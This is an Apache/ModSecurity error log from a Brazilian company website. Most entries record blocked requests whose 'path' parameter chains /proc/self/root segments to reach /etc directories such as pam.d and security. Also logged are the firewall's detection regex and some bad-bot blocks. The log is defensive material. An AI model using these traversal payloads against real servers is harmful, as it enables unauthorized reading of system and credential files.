[Wed Mar 18 08:45:44.940892 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:44776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQaCmAPhZkrhU8w4lYsQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:46.241262 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:44784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQauw_le52K8_3pV3LyAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:47.559381 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:44790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQa8df6f5d65gmYZS_mQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:51.641479 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:44794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQb_u8EFLIOrSqIpvwtwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:53.526928 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:38414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQceyqAr6etmhZHNqpUwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:56.725189 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:38416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQc0zinOy1jxa1j4f_OwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:58.483554 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:38418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQduoXxyEfFpUF8f9Z_gAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:05.635482 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:53608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQfcdf6f5d65gmYZS_rAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:15.571434 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:53616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQh9a6ubjKNq_cu4aEHwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:16.879958 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:60010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQiNY0UrI5A3LftIyMowAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:25.501505 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:60024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQkeyqAr6etmhZHNqpbwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:26.825335 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:36472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQkuw_le52K8_3pV3L9AAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:27.039499 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:36472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQk-w_le52K8_3pV3L9QAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:30.545473 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:36482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQlgkwaGbbGflqUZD8NQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:31.943387 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:36290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQl9Y0UrI5A3LftIyMtgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:33.327349 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:36296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQmQkwaGbbGflqUZD8PAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:46:59.053959 2026] [mime_magic:error] [pid 17653:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:8955] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:47:10.199315 2026] [mime_magic:error] [pid 30077:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:45851] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:47:12.664042 2026] [mime_magic:error] [pid 15051:tid 140411624429312] (70014)End of file found: [client 57.141.18.107:51854] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:47:56.390690 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:55550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQ7NY0UrI5A3LftIyNowAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:47:58.547570 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:42560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQ7SmAPhZkrhU8w4lZJgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:04.512644 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:49910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQ9OyqAr6etmhZHNqp0QAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:05.026845 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.244.43:50646] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqQ9fu8EFLIOrSqIpvxKAAAAlY"]
[Wed Mar 18 08:48:08.951432 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.228.61:49184] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqQ-EzinOy1jxa1j4f_rwAAAQU"]
[Wed Mar 18 08:48:45.041196 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:49914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRHeoXxyEfFpUF8f9agwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
